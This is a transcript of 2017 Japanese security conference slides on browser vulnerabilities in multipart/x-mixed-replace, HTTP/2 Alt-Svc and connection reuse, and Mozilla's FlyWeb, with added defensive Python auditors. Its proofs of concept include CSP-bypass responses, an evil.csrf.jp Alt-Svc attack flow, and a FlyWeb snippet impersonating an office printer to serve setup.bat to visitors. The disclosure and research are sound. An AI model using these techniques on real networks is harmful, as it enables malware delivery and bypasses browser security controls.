
脆弱性発見者が注目する近年のWeb技術 (Recent Web technologies that vulnerability researchers are watching)

Slides presented at RECRUIT Technologies NIGHT vol.3.

MUNEAKI NISHIMURA

February 03, 2017

Transcript

  1. 脆弱性発見者が注目する近年のWeb技術 (Recent Web technologies that vulnerability researchers are watching)
     RECRUIT Technologies NIGHT vol.3
     February 3, 2017

  2. Muneaki Nishimura (西村 宗晃)
     Recruit Technologies Co., Ltd.
     Cyber Security Engineering Department
     Senior Security Engineer
     Worked as a security consultant at a domestic mobile phone manufacturer, among other roles, before joining Recruit Technologies in …. Responsible for the security maintenance of Recruit's ID management platform and for supporting vulnerability remediation across the whole Recruit Group. Hobby: hunting for browser vulnerabilities; the vulnerabilities reported in … number more than …. Supervising translator of the book "ブラウザハック". Talks include CODE BLUE, AVTOKYO and PacSec. Lecturer at the Security Camp national event since ….

  3. I will introduce the Web technologies I am watching, from the viewpoint of someone who hunts for vulnerabilities.

  4. Server Push
     • A Web technology that has been discussed and improved over many years
     • Past examples include Server-Sent Events and WebSocket
     • At the IETF, Early Hints has been proposed as a way to make effective use of HTTP push
     • Standardization of receiving push notifications in the browser is also under way: the Web Push protocol and the Push API are being specified
     • Among all of these, the one I am personally watching is…

  5. multipart/x-mixed-replace

  6. http://web.archive.org/web/19961020045320/http://www3.netscape.com/assist/net_sites/pushpull.html

  7. multipart/x-mixed-replace
     • The oldest form of Server Push, shipped in Netscape in …
     • Also used as a delivery mechanism for MJPEG over HTTP
     • According to Mozilla Telemetry, its current usage rate is …
     • Today, Firefox is about the only browser that still supports it properly
     • So where on earth is it used?

  8. Bugzilla's search results page
     https://bugzilla.mozilla.org/buglist.cgi?quicksearch=nishimunea

  9. RICOH THETA (live preview API)
     https://developers.theta360.com/ja/docs/v2.1/api_reference/commands/camera.get_live_preview.html

  10. HTTP/1.0 200
     Content-type: multipart/x-mixed-replace;boundary=BOUNDARY
     --BOUNDARY
     Content-type: text/html
     Page 1
     --BOUNDARY
     Content-type: text/html
     Page 2
     --BOUNDARY--
     "Page 1" is the data for the first page; "Page 2" is the data for the second page, which replaces the first one in the browser window.

  11. Why am I watching it?

  12. Because it often ignores security headers.

  13. HTTP/1.0 200
     Content-type: multipart/x-mixed-replace;boundary=BOUNDARY
     Content-Security-Policy: default-src 'self'
     --BOUNDARY
     Content-type: text/html
     <script>alert(1)</script>
     --BOUNDARY
     Content-type: text/html
     Page 2
     --BOUNDARY--
     The CSP in the response headers forbids execution of the inline script.


  15. https://www.mozilla.org/en-US/security/advisories/mfsa2016-45/

  16. HTTP/1.0 200
     Content-type: multipart/x-mixed-replace;boundary=BOUNDARY
     --BOUNDARY
     Content-type: text/html
     Content-Security-Policy: default-src 'self'
     <script>alert(1)</script>
     --BOUNDARY
     Content-type: text/html
     Page 2
     --BOUNDARY--
     Now try moving the CSP header down, into the headers of the part.


  18. Still not fixed
     https://bugzilla.mozilla.org/show_bug.cgi?id=1296471

  19. https://bugzilla.mozilla.org/show_bug.cgi?id=1296471
     Mozilla judged that it was more important for website developers to know that the CSP implementation is incomplete than to keep the vulnerability hidden, and disclosed the details of the unfixed vulnerability.

  20. HTTP/1.0 200
     Content-type: multipart/x-mixed-replace;boundary=BOUNDARY
     Referrer-Policy: no-referrer
     --BOUNDARY
     Content-type: text/html
     <a href="…">Link</a>
     --BOUNDARY
     Content-type: text/html
     Page 2
     --BOUNDARY--
     The Referrer-Policy header forbids sending a referrer, yet the referrer is still sent when the link is followed.

  21. https://www.mozilla.org/en-US/security/advisories/mfsa2017-01/#CVE-2017-5385
     Fixed in Firefox last week.
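
For the multipart/x-mixed-replace behaviour in slides 10 to 21, the question a browser (or someone reviewing one) has to answer is: which security headers govern each document part? The Python below is an added example, not code from the deck or from Mozilla. It parses a constructed response (closing delimiter written as --BOUNDARY--, per the multipart syntax) and returns, for every part, the policies that must be enforced: the top-level response headers, which mfsa2016-45 concerns, and the part's own headers, which bug 1296471 concerns. The enforce_top and enforce_part switches are hypothetical knobs that model a client ignoring either source, and SECURITY_HEADERS is my own short list, of which the deck shows only Content-Security-Policy and Referrer-Policy.

```python
"""Added example: which security headers govern each part of a
multipart/x-mixed-replace response. Not code from the deck or Mozilla."""
from typing import Dict, List, Tuple

# Headers that carry a per-document policy. The deck shows the first two;
# the others are assumed to need the same per-part treatment.
SECURITY_HEADERS = (
    "content-security-policy",
    "referrer-policy",
    "x-frame-options",
    "x-content-type-options",
)


def parse_header_block(block: bytes) -> Dict[str, str]:
    """Parse CRLF-separated 'Name: value' lines into a lower-cased dict."""
    headers: Dict[str, str] = {}
    for line in block.split(b"\r\n"):
        if not line.strip():
            continue
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return headers


def split_response(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Split a raw HTTP/1.x response into status line, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, _, header_block = head.partition(b"\r\n")
    return status_line.decode("latin-1"), parse_header_block(header_block), body


def boundary_of(content_type: str) -> bytes:
    """Extract the boundary parameter from a multipart Content-Type value."""
    for param in content_type.split(";")[1:]:
        key, _, value = param.strip().partition("=")
        if key.strip().lower() == "boundary":
            return value.strip().strip('"').encode("latin-1")
    raise ValueError("multipart Content-Type without a boundary parameter")


def split_parts(body: bytes, boundary: bytes) -> List[Tuple[Dict[str, str], bytes]]:
    """Split the body at --boundary delimiters; stop at the --boundary-- close."""
    parts = []
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):      # closing delimiter, nothing follows
            break
        chunk = chunk.lstrip(b"\r\n")
        part_head, _, part_body = chunk.partition(b"\r\n\r\n")
        parts.append((parse_header_block(part_head), part_body.rstrip(b"\r\n")))
    return parts


def effective_security_headers(top: Dict[str, str], part: Dict[str, str],
                               enforce_top: bool = True,
                               enforce_part: bool = True) -> Dict[str, List[str]]:
    """Policies a browser must apply to one part: the top-level response
    headers and the part's own headers both count, and for CSP every
    delivered policy must be satisfied. enforce_top=False models the
    pre-mfsa2016-45 behaviour, enforce_part=False the open bug 1296471
    (both are hypothetical switches for illustration)."""
    effective: Dict[str, List[str]] = {}
    for name in SECURITY_HEADERS:
        values = []
        if enforce_top and name in top:
            values.append(top[name])
        if enforce_part and name in part:
            values.append(part[name])
        if values:
            effective[name] = values
    return effective


def audit(raw: bytes, enforce_top: bool = True,
          enforce_part: bool = True) -> List[Dict[str, List[str]]]:
    """Per-part list of the security headers that end up enforced."""
    _, top, body = split_response(raw)
    boundary = boundary_of(top["content-type"])
    return [effective_security_headers(top, part_headers, enforce_top, enforce_part)
            for part_headers, _ in split_parts(body, boundary)]


# Constructed sample: CSP at the top level, Referrer-Policy on part 1 only.
SAMPLE = (
    b"HTTP/1.0 200 OK\r\n"
    b"Content-Type: multipart/x-mixed-replace;boundary=BOUNDARY\r\n"
    b"Content-Security-Policy: default-src 'self'\r\n"
    b"\r\n"
    b"--BOUNDARY\r\n"
    b"Content-Type: text/html\r\n"
    b"Referrer-Policy: no-referrer\r\n"
    b"\r\n"
    b"<script>alert(1)</script>\r\n"
    b"--BOUNDARY\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"Page 2\r\n"
    b"--BOUNDARY--\r\n"
)

if __name__ == "__main__":
    for label, kw in (("correct client", {}),
                      ("ignores top-level headers", {"enforce_top": False}),
                      ("ignores part headers", {"enforce_part": False})):
        print(label, audit(SAMPLE, **kw))
```

With the default switches the first part carries both the CSP and the Referrer-Policy and the second part carries the CSP; with enforce_top=False the CSP vanishes from every part, which is the situation the advisory describes for a policy sent in the outer response headers.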

  22. Every time a new header appears, there is something new to play with.

  23. • In a lightning talk I presented a vulnerability (CVE-…) that abuses opportunistic encryption to make the browser connect to a fake HTTPS server
     • I first met Jxck at the http2 study group
     https://http2study.connpass.com/event/13251/

  24. Let's watch a recording that reproduces that vulnerability.


  26. The cause of the vulnerability was TLS session reuse
     Browser -> http://evil.csrf.jp : the response carries  alt-svc: h2="twitter.com:8021"
     Browser -> twitter.com:8021 (Fake, run by evil.csrf.jp) : for http://evil.csrf.jp, establish a TLS session without server certificate verification; the fake server issues a TLS session ticket
     Browser -> https://twitter.com : reuse that TLS session ticket (session resumption) and receive fake application data
     A TLS session that had been established under opportunistic encryption, without verifying the server certificate, was being reused for HTTPS communication.

  27. Connection management in HTTP/2 is quite hard
     • HTTP/2 connection reuse (defined in the HTTP/2 RFC)
       - If the host has the same IP address and is covered by the CN/SAN of the same certificate, the HTTP/2 connection may be shared
     • HTTP Alternative Services (defined in the Alt-Svc RFC)
       - Proposes to the client an alternative server that provides the same resources
       - Example: offer HTTP/2 on port 8000 of alt.example.jp
         alt-svc: h2="alt.example.jp:8000";

  28. When an HTTP/2 connection is shared across multiple domains
     Browser -> yahoo.com : establish TLS session; certificate (valid for yahoo.com & flickr.com)
     Browser -> flickr.com : requests sent over the same connection
     A connection established for communication with yahoo.com can be reused for communication with flickr.com.

  29. Server certificate pinning checks are often missed on such shared connections
     Here, the browser forgets to verify flickr.com's public-key pins when the yahoo.com connection is reused (a CVE was assigned for Firefox and another for Chrome).

  30. Is that really a vulnerability?
     Both sites belong to the same owner, so skipping flickr.com's pin check does not seem to pose much of a real threat, does it?

  31. The same certificate does not mean the same site owner
     • For example, Fastly's shared certificate service
       - Take a look at the certificate of https://ja.foursquare.com

  32. Which means the pinning of every site on that shared certificate can be bypassed.

  33. HTTP Alternative Services (Alt-Svc)
     Browser -> a.example.com : establish TLS session; certificate; verify certificate
     a.example.com -> Browser : alt-svc: h2="b.example.jp:443"
     Browser -> b.example.jp : HTTP/2 application data (authority: a.example.com)

  34. The correct Alt-Svc implementation looks like this, but…
     When connecting to b.example.jp, request a.example.com's certificate via SNI
     Verify that the presented certificate is for a.example.com

  35. Get the implementation wrong and it becomes a DNS rebinding vulnerability
     The client requests b.example.jp's certificate via SNI
     and verifies that the certificate is for b.example.jp
     so a.example.com's HTTP data can be delivered to someone else's server

  36. A case where this implementation mistake allowed CORS to be bypassed
     Browser on evil : XMLHttpRequest with DELETE method
     Browser -> evil : preflight (OPTIONS method); the response carries alt-svc: h2="victim:443"
     Browser -> victim : DELETE request
     The preflight is answered by the attacker's site… and only the actual request is sent to the target.
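
Slides 27 to 36 come down to one question for both connection coalescing and Alt-Svc: which host name, and whose pin set, is the presented certificate checked against? The Python below is an added example, not code from the deck or from any browser. Certificates, DNS answers, addresses and pin sets are constructed test data, and the sha256/... strings are placeholders rather than real SPKI digests. may_coalesce implements the HTTP/2 reuse rule from slide 27 plus the per-host pin check that slide 29 says was skipped (check_pins=False reproduces that); parse_alt_svc, tls_params_for_alternative and may_use_alternative show that an alternative from slides 33 to 35 must be authenticated as the origin, and the verify_name argument is a hypothetical knob that reproduces the wrong implementation.

```python
"""Added example: which name must a coalesced or Alt-Svc connection be
authenticated against? Not code from the deck or from any browser; all
certificates, addresses and pins below are constructed test data."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple


@dataclass
class Cert:
    sans: Set[str]           # dNSName entries of the leaf certificate
    spki_hashes: List[str]   # "sha256/..." SPKI hashes of the chain (placeholders)


@dataclass
class Connection:
    host: str                # origin the connection was opened and validated for
    ip: str
    cert: Cert


def cert_covers(cert: Cert, host: str) -> bool:
    """Does the certificate's SAN list cover host? A wildcard matches one label."""
    host = host.lower()
    for san in cert.sans:
        san = san.lower()
        if san.startswith("*."):
            if host.endswith(san[1:]) and host.count(".") == san.count("."):
                return True
        elif san == host:
            return True
    return False


def pins_satisfied(cert: Cert, pins: Optional[Set[str]]) -> bool:
    """HPKP-style check: some SPKI hash in the chain must be in the pin set."""
    return pins is None or any(h in pins for h in cert.spki_hashes)


def may_coalesce(conn: Connection, host: str, dns: Dict[str, Set[str]],
                 pins: Dict[str, Set[str]], check_pins: bool = True) -> bool:
    """HTTP/2 connection reuse: same IP, certificate valid for the new host,
    and (the step the deck says browsers forgot) the NEW host's own pins.
    check_pins=False models the vulnerable behaviour."""
    if conn.host == host:
        return True
    if conn.ip not in dns.get(host, set()):
        return False
    if not cert_covers(conn.cert, host):
        return False
    return not check_pins or pins_satisfied(conn.cert, pins.get(host))


def parse_alt_svc(value: str) -> List[Tuple[str, str, int]]:
    """Parse an Alt-Svc header value into (protocol, host, port) triples.
    An empty host means 'same host as the origin'."""
    alts = []
    for member in value.split(","):
        member = member.strip()
        if not member or member == "clear":
            continue
        proto, _, authority = member.split(";")[0].strip().partition("=")
        host, _, port = authority.strip().strip('"').rpartition(":")
        alts.append((proto.strip(), host, int(port)))
    return alts


def tls_params_for_alternative(origin_host: str, alt_host: str, alt_port: int) -> Dict[str, str]:
    """An alternative serves the ORIGIN's resources, so SNI, the name check
    and the pin set are all the origin's; only the transport address changes."""
    return {
        "connect_to": f"{alt_host or origin_host}:{alt_port}",
        "sni": origin_host,
        "verify_name": origin_host,
        "pins_for": origin_host,
    }


def may_use_alternative(origin_host: str, presented: Cert, pins: Dict[str, Set[str]],
                        verify_name: Optional[str] = None) -> bool:
    """Accept the alternative only if its certificate is valid for the origin.
    verify_name is a hypothetical knob: passing the alternative's own name
    reproduces the DNS-rebinding-style bug from slide 35."""
    name = verify_name or origin_host
    return cert_covers(presented, name) and pins_satisfied(presented, pins.get(origin_host))


# Constructed data: one certificate shared by yahoo.com and flickr.com, and
# flickr.com pinned to a CA that is not in that certificate's chain.
SHARED_CERT = Cert(sans={"yahoo.com", "*.yahoo.com", "flickr.com"},
                   spki_hashes=["sha256/LEAF_Y", "sha256/CA_Y"])
CERT_B = Cert(sans={"b.example.jp"}, spki_hashes=["sha256/LEAF_B", "sha256/CA_B"])
DNS = {"yahoo.com": {"203.0.113.10"}, "mail.yahoo.com": {"203.0.113.10"},
       "flickr.com": {"203.0.113.10"}, "a.example.com": {"203.0.113.20"}}
PINS = {"flickr.com": {"sha256/CA_F"}}
CONN = Connection(host="yahoo.com", ip="203.0.113.10", cert=SHARED_CERT)

if __name__ == "__main__":
    print("coalesce flickr.com, pins checked:", may_coalesce(CONN, "flickr.com", DNS, PINS))
    print("coalesce flickr.com, pins skipped:", may_coalesce(CONN, "flickr.com", DNS, PINS, check_pins=False))
    proto, alt_host, alt_port = parse_alt_svc('h2="b.example.jp:443"; ma=300')[0]
    print("alt-svc TLS params:", tls_params_for_alternative("a.example.com", alt_host, alt_port))
    print("accept alternative, origin name verified:", may_use_alternative("a.example.com", CERT_B, PINS))
    print("accept alternative, alt name verified (buggy):",
          may_use_alternative("a.example.com", CERT_B, PINS, verify_name="b.example.jp"))
```

The two failure modes in the deck map onto the two knobs: with check_pins=False the shared yahoo.com connection is handed to flickr.com even though flickr.com's pins are not met, and with verify_name set to the alternative's own name a server that can only prove it is b.example.jp is accepted as a.example.com.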

  37. https://bugzilla.mozilla.org/show_bug.cgi?id=1148357
     From the bug: "I am astonished. This is the first vulnerability that uses Alt-Svc."

  38. Similar vulnerabilities will surely keep appearing.

  39. https://flyweb.github.io/#showcase

  40. FlyWeb
     • A Mozilla project that connects the Web with physical devices
       - Web content interacts with the various devices near the person viewing it
     • The project is still experimental
       - Shipped only in Firefox Nightly, disabled by default
       - Enable it by setting dom.flyweb.enabled = true in about:config

  41. An example use of FlyWeb (FlyWeb GP)
     • Connects several smartphones to run a competitive racing game in the browser
     https://www.youtube.com/watch?v=FJ5DEGvqDb4

  42. How FlyWeb works
     Local network:
     (1) Launch a website
     (2) HTML / JS
     (3) Publish mDNS and web servers
     (4) DNS Service Discovery
     (5) HTTP & WebSocket
     JavaScript starts a server; devices within the local area access that server.


  44. navigator.publishServer('MyServer').then(server => {   // publish an mDNS service plus an HTTP server
       // Called for every HTTP request that reaches the published server
       server.onfetch = e => {
         var headers = {'Content-Type': 'text/html'};
         var body = 'Hello FlyWeb';
         e.respondWith(new Response(body, {headers: headers}));
       };
     });
     Starts an mDNS responder and an HTTP server under the service name MyServer._flyweb._tcp.local
     When a device on the local network accesses the server, it returns HTML reading "Hello FlyWeb"

  45. A dialog asks the user to confirm starting the server; when the user viewing the page chooses "Allow Server", an mDNS responder and an HTTP server start up on the local network.

  46. Another device on the local network connects to the server
     • Firefox automatically discovers FlyWeb servers on the local network and makes them accessible

  47. It can also open the admin UI of Bonjour-capable office printers
     • Firefox's FlyWeb window also handles _http._tcp, so devices that offer an HTTP UI over Bonjour are reachable too

  48. FlyWeb looks like a way to break into a company network
     Local network:
     (1) Launch a website (an employee carelessly browses a trap site)
     (2) HTML / JS
     (3) Publish mDNS and web servers (FlyWeb impersonates the admin UI of the office printer)
     (4) Launch HTTP UI
     (5) Download malware (malware is distributed to any device that accesses the admin UI)

  49. navigator.publishServer('Can0n ME220').then(server => {   // same service name as the office printer
       server.onfetch = e => {
         // Hand every client a batch file as a download
         var h = {'Content-Type': 'application/bat',
                  'Content-Disposition': 'attachment; filename=setup.bat'};
         var cmd = 'calc';   // payload; the demo just launches the calculator
         e.respondWith(new Response(cmd, {headers: h}));
       };
     });
     Use the same DNS name as the office printer
     Hand out setup.bat to every device that accesses it
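
The attack in slides 47 to 49 relies on a FlyWeb service instance carrying the same, or a lookalike, name as a real Bonjour printer. The Python below is an added example of how a defender on the local network could spot that; it is not code from the deck or from Mozilla. Its input is a constructed list of DNS-SD PTR answers written as tab-separated lines, and the printer's real name "Canon ME220", the host names and the confusable-character table are all assumptions of the example. It groups instances by a normalized name and flags any _flyweb._tcp instance that shares a name with a different service type advertised from another host.

```python
"""Added example: spot DNS-SD (Bonjour/mDNS) service instances that mimic
another device's name, such as a FlyWeb server named like an office
printer. Not code from the deck; the PTR lines below are constructed."""
from collections import defaultdict
from typing import Dict, List, NamedTuple

FLYWEB_SERVICE = "_flyweb._tcp.local"   # service type FlyWeb publishes (slide 44)

# Assumed lookalike table: digits and symbols an attacker swaps for letters.
CONFUSABLES = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "8": "b", "|": "l"})


class ServiceInstance(NamedTuple):
    instance: str   # human-readable instance name, e.g. "Can0n ME220"
    service: str    # service type, e.g. "_flyweb._tcp.local"
    host: str       # mDNS host that advertises it


def normalize(name: str) -> str:
    """Case-fold, collapse whitespace and undo common character swaps."""
    return " ".join(name.lower().translate(CONFUSABLES).split())


def parse_ptr_lines(lines: List[str]) -> List[ServiceInstance]:
    """Parse constructed tab-separated lines of the form
    '<service>\\t<instance>.<service>\\t<advertising host>'."""
    records = []
    for line in lines:
        service, target, host = line.rstrip("\n").split("\t")
        suffix = "." + service
        if not target.endswith(suffix):
            continue                     # not a PTR for this service type
        records.append(ServiceInstance(target[: -len(suffix)], service, host))
    return records


def find_impersonations(records: List[ServiceInstance]) -> List[Dict[str, str]]:
    """Report FlyWeb instances whose normalized name equals that of a
    non-FlyWeb instance advertised by a different host."""
    by_name: Dict[str, List[ServiceInstance]] = defaultdict(list)
    for rec in records:
        by_name[normalize(rec.instance)].append(rec)
    findings = []
    for group in by_name.values():
        flyweb = [r for r in group if r.service == FLYWEB_SERVICE]
        others = [r for r in group if r.service != FLYWEB_SERVICE]
        for f in flyweb:
            for o in others:
                if o.host != f.host:
                    findings.append({
                        "flyweb_instance": f.instance, "flyweb_host": f.host,
                        "mimics": o.instance, "mimics_service": o.service,
                        "device_host": o.host,
                    })
    return findings


# Constructed sample: a real printer on printer-a1b2.local, a FlyWeb server on
# an employee laptop using a zero instead of the letter o, and benign noise.
SAMPLE_PTRS = [
    "_ipp._tcp.local\tCanon ME220._ipp._tcp.local\tprinter-a1b2.local",
    "_http._tcp.local\tCanon ME220._http._tcp.local\tprinter-a1b2.local",
    "_flyweb._tcp.local\tCan0n ME220._flyweb._tcp.local\tlaptop-42.local",
    "_flyweb._tcp.local\tMyServer._flyweb._tcp.local\tlaptop-17.local",
    "_http._tcp.local\tNAS Admin._http._tcp.local\tnas.local",
]

if __name__ == "__main__":
    for finding in find_impersonations(parse_ptr_lines(SAMPLE_PTRS)):
        print(finding)
```

On the sample the only hit is the laptop's "Can0n ME220" FlyWeb instance, reported once per printer service it shadows (_ipp._tcp and _http._tcp); "MyServer" and the NAS produce nothing because no other host advertises those names.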

  50. The domain does look suspicious, so people would probably be wary, but…

  51. Opened through Google Translate, the domain looks plausible.

  52. When another employee accesses the fake office printer…
     "Printer driver, I guess…?"

  53. With the specification as it stands, this really looks ripe for abuse.

  54. I introduced three Web technologies I am watching:
     • Server Push (multipart/x-mixed-replace)
     • HTTP/2
     • FlyWeb